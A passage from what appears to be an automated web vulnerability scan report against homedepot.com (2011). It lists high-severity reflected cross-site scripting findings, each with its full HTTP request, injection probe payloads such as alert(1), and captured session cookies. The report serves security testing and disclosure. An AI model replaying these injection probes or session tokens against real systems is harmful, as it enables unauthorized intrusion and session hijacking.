THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224138370%3a%3bC25%5fEXP%3d1360064138%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227738451%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ckQjrscmhQuxLSR9cYv9SV7c0668%3d; s_pers=%20s_scOpen%3D1%7C1308225942967%3B%20s_campaign%3Dno%2520value%7C1308225943059%3B%20s_prevPage%3Dproductdetails%7C1308225943066%3B%20p_30%3DPIP%7C1308225943073%3B; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=6; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 223248
Expires: Thu, 16 Jun 2011 12:17:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:17:01 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308226621384%3a%3bC25%5fEXP%3d1360066621%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:17:01 GMT;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: WC_PERSISTENT=A44toZ%2f8rM7nZbazUxUMi30vWDk%3d%0a%3b2011%2d06%2d16+08%3a17%3a01%2e411%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:20:29 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308230221412%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cm3JVkUY3QyZfRjBuaY6R%2fhUvpbw%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http://ww
...[SNIP]...
00AB%29%3C%2Fscript%3E";s.prop8="0";s.prop37="search all";s.prop5="'"-->MaliciousScriptReplacedMaliciousScriptReplacedMaliciousScriptReplacednetsparker(0x0000AB)MaliciousScriptReplaced";s.prop37="34f299';alert(1)//c29329b2a9e";s.prop4="'"-->
...[SNIP]...

3.180. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay [Overlay_Type parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/Bopis2OverLay

Issue detail

The value of the Overlay_Type request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d9cf'%3b47be4017b88 was submitted in the Overlay_Type parameter. This input was echoed as 3d9cf';47be4017b88 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /webapp/wcs/stores/servlet/Bopis2OverLay?langId=-1&storeId=10051&catalogId=10053&R=202562705&langId=-1&catalogId=10053&storeSkuNum=420816&Overlay_Type=add_to_cart3d9cf'%3b47be4017b88&locStoreNum=2583&pageNum=0&mode=localstore&quantity=1&basePage=PLP HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224031349%3a%3bC25%5fEXP%3d1360064031%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000

Response

3.181. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay [basePage parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/Bopis2OverLay

Issue detail

The value of the basePage request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64e54'%3bf224e410589 was submitted in the basePage parameter. This input was echoed as 64e54';f224e410589 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /webapp/wcs/stores/servlet/Bopis2OverLay?langId=-1&storeId=10051&catalogId=10053&R=202562705&langId=-1&catalogId=10053&storeSkuNum=420816&Overlay_Type=add_to_cart&locStoreNum=2583&pageNum=0&mode=localstore&quantity=1&basePage=PLP64e54'%3bf224e410589 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224031349%3a%3bC25%5fEXP%3d1360064031%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000

Response

3.182. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay [storeSkuNum parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/Bopis2OverLay

Issue detail

The value of the storeSkuNum request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5534c'%3b080bd1b0e96 was submitted in the storeSkuNum parameter. This input was echoed as 5534c';080bd1b0e96 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /webapp/wcs/stores/servlet/Bopis2OverLay?langId=-1&storeId=10051&catalogId=10053&R=202562705&langId=-1&catalogId=10053&storeSkuNum=4208165534c'%3b080bd1b0e96&Overlay_Type=add_to_cart&locStoreNum=2583&pageNum=0&mode=localstore&quantity=1&basePage=PLP HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224031349%3a%3bC25%5fEXP%3d1360064031%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000

Response

3.183. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService [catEntryId_1 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderItemAddService

Issue detail

The value of the catEntryId_1 request parameter is copied into the HTML document as plain text between tags. The payload 1f1ce<a%20b%3dc>5181cfdde58 was submitted in the catEntryId_1 parameter. This input was echoed as 1f1ce<a b=c>5181cfdde58 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/wcs/stores/servlet/OrderItemAddService?langId=-1&storeId=10051&catalogId=10053&catEntryId_1=2026429711f1ce<a%20b%3dc>5181cfdde58&Quantity_1=1&quantity_1=1 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService?langId=-1&storeId=10051&catalogId=10053&R=202642971&catEntryId=202642971
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%222%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%243%2c798%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816094%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224094066%3a%3bC25%5fEXP%3d1360064094%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227694814%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cufvYdumw7ZxHWtTtpzjDpT0%2bqW0%3d; s_pers=%20s_scOpen%3D1%7C1308225928423%3B%20s_campaign%3Dno%2520value%7C1308225928433%3B%20s_prevPage%3Dno%2520value%7C1308225928439%3B%20p_30%3Dno%2520value%7C1308225928457%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20p_v62%3Dnon-major%2520appliance%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 163
Expires: Thu, 16 Jun 2011 11:44:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:44:50 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224690403%3a%3bC25%5fEXP%3d1360064690%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.